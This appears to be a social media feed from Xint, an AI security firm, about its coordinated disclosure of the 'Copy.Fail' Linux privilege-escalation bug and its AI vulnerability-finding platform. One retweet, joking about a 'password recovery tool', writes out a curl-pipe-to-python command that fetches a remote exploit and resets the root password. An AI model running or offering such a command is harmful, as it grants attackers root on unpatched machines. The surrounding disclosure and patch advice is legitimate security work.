Xint

106 posts

@xint_official

What if the world's best hackers rebuilt AppSec from the ground up with AI? Meet Xint - autonomous, comprehensive, fast, and actionable.

Joined February 2026
11 Following, 544 Followers
Xint retweeted
jinmo123 @jinmo123
One of the craziest bugs in Linux history. This doesn't even need a race condition like DirtyCOW. Disable the algif_aead module immediately as described there😲
Xint @xint_official

Patch your Linux boxes! Copy.Fail is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms. Found by the teams at @theori_io and @xint_official More details below xint.io/blog/copy-fail…

Xint retweeted
5unkn0wn @5unKn0wn
This is my first Linux kernel exploit for Google kCTF, and the patch commit is now public: git.kernel.org/pub/scm/linux/… Actually, this bug was found by AI while analyzing 1-day variants. I'd like to share my approach for these AI things to find bugs, and an exploitation write-up, later.
Xint @xint_official
@0xblacklight Coordinated disclosure with the Linux kernel security team — the fix landed in mainline on April 1. We are now able to talk about it publicly and are using this opportunity to remind organizations running Linux infra to patch.
Xint retweeted
Brian Pak @brian_pak
Surfaced by Xint Code — our AI vuln research platform — pointed at the kernel's crypto/ for about an hour, on a starting hunch from @5unKn0wn. Came back with CopyFail (plus others, still in coordinated disclosure). Write-up + PoC (exploit): copy.fail Xint Code: code.xint.io
Xint retweeted
Brian Pak @brian_pak
Origin: a "harmless" 2017 in-place optimization in algif_aead. Nobody noticed for 9 years. Every distro. Same bug. Same 732 bytes.
Xint retweeted
Brian Pak @brian_pak
The bug: a straight-line logic flaw in authencesn, reachable from any unprivileged user via AF_ALG, chained through splice() into a 4-byte page-cache write. 4 bytes, on the right page, to root.
Xint retweeted
Tim Becker @tjbecker
Very cool Linux bug found by @xint_official. 100% reliable, instant LPE from a portable python script that works on all platforms and distros. Root cause is a subtle logic bug at the intersection of several subsystems. I highly recommend patching and checking out the details!
Xint @xint_official

Patch your Linux boxes! Copy.Fail is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms. Found by the teams at @theori_io and @xint_official More details below xint.io/blog/copy-fail…

Xint retweeted
Juno @junorouse
We (@xint_official ) released the 2026 version of Universal Linux Password Recovery Tool. Forgot your root password? $ curl copy.fail/pw | TARGET_USER=root python3 | su It recovers your lost password and resets it to: "xint.io" (without quote)
Xint @xint_official
Patch your Linux boxes! Copy.Fail is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms. Found by the teams at @theori_io and @xint_official More details below xint.io/blog/copy-fail…
Xint retweeted
Brian Pak @brian_pak
a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9 👀
Xint retweeted
Tim Becker @tjbecker
The Verge published a new article with quotes from several industry experts on how AI is impacting vulnerability discovery and exploitation. Also, it has great art! Check it out
Xint @xint_official

'Before [Xint security researcher @tjbecker] started working on automatic bug finding with AI, he worked on vulnerability research, finding zero days and reporting them to maintainers. He said it used to take him weeks or months to find a high-impact vulnerability in a brand-new codebase, and now it only takes hours. “I just drop the code into our AI bug-finding tool [Xint] and in a couple hours I get a report with a bunch of candidate vulnerabilities, and most of them end up checking out and being real issues,” he said. “The bar to diving into a new million-line codebase and finding a bug is so much lower than it used to be.”' Great report from @verge looking into the new era of cybersecurity, where even non-technical attackers can use AI to find the weaknesses in the apps and networks of organizations faster and at a scale never thought possible before. theverge.com/ai-artificial-…

Xint @xint_official
Here's where you have to go beyond bug finding. From what we see, without proper scaffolding LLMs are generating so many false positives that it's like taking a needle from a haystack (real vuln in a sea of code) and dropping it into a stack of staples (real vuln in a sea of things that look like vulns but aren't). This is the difference between software that finds bugs and a real platform for security teams - how much does it accelerate not just discovery but the whole triage process (validation, sev assessment, remediation). We have a whole system for filtering out false positives but more importantly trigger/impact reports that are so detailed you can get a POC in minutes and a patch almost as fast. This is why we think defenders can stay ahead of attackers. Here's a cool example of how we were able to go from discovery to validation to patched with less than 45 minutes TOTAL of human intervention: xint.io/blog/finding-a…
Jeremie Strand @jeremie_strand
@xint_official @tjbecker Weeks to hours is a massive compression. The real question is whether defenders get the same speedup or if offense stays ahead just because the attack surface is so much bigger than what any tool can harden.
Xint @xint_official
'Before [Xint security researcher @tjbecker] started working on automatic bug finding with AI, he worked on vulnerability research, finding zero days and reporting them to maintainers. He said it used to take him weeks or months to find a high-impact vulnerability in a brand-new codebase, and now it only takes hours. “I just drop the code into our AI bug-finding tool [Xint] and in a couple hours I get a report with a bunch of candidate vulnerabilities, and most of them end up checking out and being real issues,” he said. “The bar to diving into a new million-line codebase and finding a bug is so much lower than it used to be.”' Great report from @verge looking into the new era of cybersecurity, where even non-technical attackers can use AI to find the weaknesses in the apps and networks of organizations faster and at a scale never thought possible before. theverge.com/ai-artificial-…
Xint retweeted
Ckrielle @ckrielle
Another i0rs post, this time from @0x3dward who takes it upon himself to write a POC for a recently discovered heap buffer overflow in PostgreSQL's pgcrypto leading to RCE, originally discovered by team @xint_official. Enjoy🤘🔥 i0.rs/blog/smashing-…
Xint @xint_official
"Why would I pay you when Claude Enterprise now bundles security scanning?" This question assumes that the model is the product. But real AppSec is more than just finding vulnerabilities. To actually be useful to #productsecurity teams you need to know what to target, how to validate findings, how to prevent false positives from drowning teams, how to know which of the true positives are worth patching, and more. See what's the difference between software that can find bugs and a true AppSec platform xint.io/blog/167832
Xint @xint_official
Our cofounder/CTO and VP of Product were interviewed as part of this article from @IEEESpectrum about what the ramifications are for the launch of #mythos. In short, finding 0days has been a capability that LLMs have demonstrated for the past year with Mythos providing an incremental improvement. But the new bottleneck has become the validation, severity assessment, and remediation of these bugs. spectrum.ieee.org/anthropic-clau…